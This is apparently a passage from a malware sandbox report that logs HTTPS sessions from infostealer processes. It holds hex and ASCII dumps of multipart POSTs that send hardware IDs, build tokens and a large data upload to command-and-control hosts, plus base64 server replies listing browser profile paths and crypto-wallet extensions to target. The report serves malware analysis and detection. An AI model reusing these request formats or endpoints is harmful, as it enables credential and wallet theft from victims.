                                                                                                                                                                                                                                                                          2024-12-21 00:14:55 UTC15331OUTData Raw: 2d 2d 41 58 31 46 56 4b 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 58 31 46 56 4b 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 58 31 46 56 4b 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 41 58 31 46 56 4b 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                                          Data Ascii: --AX1FVKTZContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--AX1FVKTZContent-Disposition: form-data; name="pid"3--AX1FVKTZContent-Disposition: form-data; name="lid"FATE99--test--AX1FVKTZContent-Dispositi
                                                                                                                                                                                                                                                                          2024-12-21 00:14:55 UTC5175OUTData Raw: 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00 00
                                                                                                                                                                                                                                                                          Data Ascii: un 4F([:7s~X`nO`i`u?
                                                                                                                                                                                                                                                                          2024-12-21 00:14:56 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=11o5nlajcq5gjjtdkonng3m86n; expires=Tue, 15 Apr 2025 18:01:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=783Fq07KiK9X5jAu0BJRshtvVGe2KD3WegU5wFlIbflDRQsxDdw88nW5yTEXbX6LvhqRzKeD0Z1PSpoUuMEwxFSoyKurDgwgZS%2FR4aOSSmAyo4IQPPn3cMF709ODs2EDk3YlkFkp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53acbf79404239-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2331&min_rtt=2248&rtt_var=902&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21461&delivery_rate=1298932&cwnd=229&unsent_bytes=0&cid=82682acd25ebd9c1&ts=1001&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:14:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.54994598.85.100.804436704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:57 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                                          Host: httpbin.org
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          2024-12-21 00:14:57 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:57 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          2024-12-21 00:14:57 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                                                                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.549950116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:58 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----3O8GDBAS0ZU37YUAS0ZM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:14:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------3O8GDBAS0ZU37YUAS0ZMContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------3O8GDBAS0ZU37YUAS0ZMContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------3O8GDBAS0ZU37YUAS0ZMCont
                                                                                                                                                                                                                                                                          2024-12-21 00:14:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:58 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:14:58 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.549953104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:59 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=CR85IJPPJ3
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:14:59 UTC1245OUTData Raw: 2d 2d 43 52 38 35 49 4a 50 50 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 52 38 35 49 4a 50 50 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 52 38 35 49 4a 50 50 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 43 52 38 35 49 4a 50 50 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                                          Data Ascii: --CR85IJPPJ3Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--CR85IJPPJ3Content-Disposition: form-data; name="pid"1--CR85IJPPJ3Content-Disposition: form-data; name="lid"FATE99--test--CR85IJPPJ3Content-D
                                                                                                                                                                                                                                                                          2024-12-21 00:15:00 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:00 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p0bejhosig5pji10pts6996ebe; expires=Tue, 15 Apr 2025 18:01:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yffVlPRx5NDRaY4L2FTD1f6BhSZ9OL0bZtqx0zvxqkuod7hTumhh%2Bgjrcy69fU4V4VhxoElxivPEFpPfWkr9XpNtUWoKp28myv7CWNwIe6YEQAqoZibdnOwbqBfKIQUrCilR34GC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53acd73ad918b8-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1504&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2157&delivery_rate=1917268&cwnd=186&unsent_bytes=0&cid=843c5e4a45e393b5&ts=793&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:15:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.549958116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7QQ1N79ZC2V37Q9ZCBIW
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:00 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------7QQ1N79ZC2V37Q9ZCBIWCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:01 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.549963104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=5UAFWBEGY5
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 551772
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: 2d 2d 35 55 41 46 57 42 45 47 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 55 41 46 57 42 45 47 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 55 41 46 57 42 45 47 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 35 55 41 46 57 42 45 47 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                                          Data Ascii: --5UAFWBEGY5Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--5UAFWBEGY5Content-Disposition: form-data; name="pid"1--5UAFWBEGY5Content-Disposition: form-data; name="lid"FATE99--test--5UAFWBEGY5Content-D
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: cf 0a 53 58 34 eb 0c 62 66 fe eb 2c 26 74 69 d8 84 c4 40 cc 88 e4 ca a1 e9 bc 65 10 b0 97 aa 8d 0d e1 03 53 bd e8 c5 cd a3 43 11 87 ef b2 af 1b 14 a1 28 0d 71 95 4f 35 d2 b6 1a 23 da 8e e3 de fc 5e 78 97 7c 08 9d 80 da 2a 11 4c b1 66 e0 49 9e ad e5 4f 6d ac 74 4d 97 21 b3 36 9b 9a 8c a8 9a 31 27 7e 43 4e f6 28 02 8e 17 6f 8e 0c 36 1d 66 5a 4c 36 6e ea 26 7d 67 6b 64 57 c7 84 a5 42 48 76 a5 10 15 03 4f a3 8e fd f5 05 de 54 43 51 ca 40 f1 3a dd a0 79 49 d3 c6 b5 3a 15 8b 77 00 5f 8c c4 82 5c 66 3f 07 9c 50 22 29 ec ec 47 f9 04 3a 3e 46 c4 04 a8 b1 48 65 68 cb e5 16 3d 1c 80 ba 6c e7 6b 44 09 a9 16 7d cd 2d 99 99 92 31 2a bb 3b f1 45 01 1c 11 e6 65 1d 12 b9 2e ca 18 1b f9 0d 90 b2 ab 7b 49 27 df 3a e8 76 8e 58 95 e1 ae ad 3c 0c 9b 94 ec ac 94 5c 8c 1d a9 92
                                                                                                                                                                                                                                                                          Data Ascii: SX4bf,&ti@eSC(qO5#^x|*LfIOmtM!61'~CN(o6fZL6n&}gkdWBHvOTCQ@:yI:w_\f?P")G:>FHeh=lkD}-1*;Ee.{I':vX<\
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: 44 a6 e5 c3 70 a4 12 41 d7 5e 10 21 ad 6a 14 f9 3b 21 91 66 df 77 19 7a 9b bd 3d e8 30 c4 49 ef b0 45 9b 1e 28 f7 30 b3 35 83 04 fd 64 47 ba a8 b1 91 17 be cd bf 47 c5 d7 61 31 10 f8 74 7a 5f 91 26 9e 20 48 f2 c2 49 0b b9 49 52 0d e0 22 47 20 1d 05 bf 59 3d f3 32 90 df 24 f7 bf 24 79 aa a1 71 61 6f 52 d7 9f d3 06 97 bd e7 cb ff 9d fd 74 a0 b1 b2 ad e8 25 ab 02 65 5b 28 46 e8 d9 bf 98 87 9a ff 6b a3 ff c9 7f 51 8c aa bd c9 6d 43 e4 b5 c7 6b e7 f0 20 c3 fb 75 95 6b 46 53 4b 9e 05 b9 23 33 d0 29 ca 5c 33 79 e7 98 c3 fb 88 51 df 43 92 5d 7f 4f b2 29 9c ab a0 54 df 70 e7 fb ee eb 71 a5 7e 9a e7 5e 55 f1 ae bb 3c 79 5a b6 d9 35 ff 60 a3 cd 0f 5d f6 de 44 38 e5 46 85 3e 5e 55 a8 6c 9d e7 32 a3 0a 2e 59 b7 73 e7 be 3a ab 39 c6 57 e2 5d 1b 73 3b 6b a2 52 b5 6d 00
                                                                                                                                                                                                                                                                          Data Ascii: DpA^!j;!fwz=0IE(05dGGa1tz_& HIIR"G Y=2$$yqaoRt%e[(FkQmCk ukFSK#3)\3yQC]O)Tpq~^U<yZ5`]D8F>^Ul2.Ys:9W]s;kRm
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: 8d 9e 30 81 be ed 8f 0b 97 a3 9d d6 25 0e b7 66 f6 f1 77 a1 ee 73 d6 21 bb 5f fd d1 70 ea d3 71 b0 09 e7 78 87 47 f0 60 86 9a 66 ef 8f dc 4b d8 54 cc 7d b2 56 af 43 3e f5 0d 7f 59 16 cb b5 28 d5 3d 2e a0 8a a6 9c 5a cc 33 44 2e 3e 76 77 20 55 48 04 9c cb b5 8c c0 7f 2e 0d bc a0 1b e6 7c 23 3f da 27 51 c0 8d 4b 2a 7f c3 73 6a dd 7d d8 90 bc 72 c5 21 e4 d5 cf d5 9a ad ba 4f e3 e3 74 7c 4b 21 4f 84 0a 9d 8b cd 50 88 78 89 a4 9f 4e 5d a1 c4 a8 54 ca ce 9f 3f b4 8e c3 27 0d 34 84 4a 6f 3d 32 e4 56 8b c1 aa f5 87 57 32 9d 87 84 8d df 52 1e 31 f8 27 a6 fc 0a ba b6 02 9d 78 75 c7 73 f5 c1 3e d7 fc 96 ee 19 99 73 1f 4c b4 43 53 b9 16 26 0b d0 36 86 65 c3 32 f3 e2 29 01 e4 e5 90 81 89 20 6c 92 69 78 a0 6c c8 c2 bc b6 ae 8b b7 b4 fd b6 fb dd 3a 0d 22 1e 4c c6 1f fc
                                                                                                                                                                                                                                                                          Data Ascii: 0%fws!_pqxG`fKT}VC>Y(=.Z3D.>vw UH.|#?'QK*sj}r!Ot|K!OPxN]T?'4Jo=2VW2R1'xus>sLCS&6e2) lixl:"L
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: ab 5d f5 cd 1d 43 3b 01 b9 77 3f 12 9a 4f 26 23 bd 0a 88 6a 63 47 23 d4 b2 12 e2 2a 44 c7 a1 55 81 f5 63 f3 3f 5c d5 6e b2 6e 1d c3 be 21 26 ba b8 19 2d 6a 19 1f a5 4f f1 31 75 a1 db 19 bb 70 19 ca 0f d6 97 57 7c 64 1e 9e 8e 6f 60 a7 54 4a ce 14 5b 85 f4 28 49 14 7e 8b 76 c6 4e 26 47 fc 88 2f 90 7e e3 c5 31 3d 4b 17 66 bd d7 83 97 de cc 7a d1 49 ec bd 81 3b 07 c3 88 97 fe 6f 94 0d de b4 fe bf a1 96 00 6c 76 8c 5f ff 07 28 11 f7 f6 0e 84 aa 70 4a 08 83 7d a8 88 db e0 1e 07 18 a7 56 9e 83 48 73 bf cc c2 dc 52 10 74 85 06 92 2a c0 7d e0 07 e0 08 03 09 22 8a 45 c3 c8 47 30 bc 56 8c e8 2f b8 13 1c 5d 86 5e 8e af 37 65 dd e4 41 f6 3c fd 38 10 7f b9 f3 7c 62 af 39 cc 4a aa 08 10 9c 85 36 0f f3 74 54 e8 03 73 52 c3 95 d0 a2 61 b1 a3 46 03 f9 89 ad b9 41 e6 49 a5
                                                                                                                                                                                                                                                                          Data Ascii: ]C;w?O&#jcG#*DUc?\nn!&-jO1upW|do`TJ[(I~vN&G/~1=KfzI;olv_(pJ}VHsRt*}"EG0V/]^7eA<8|b9J6tTsRaFAI
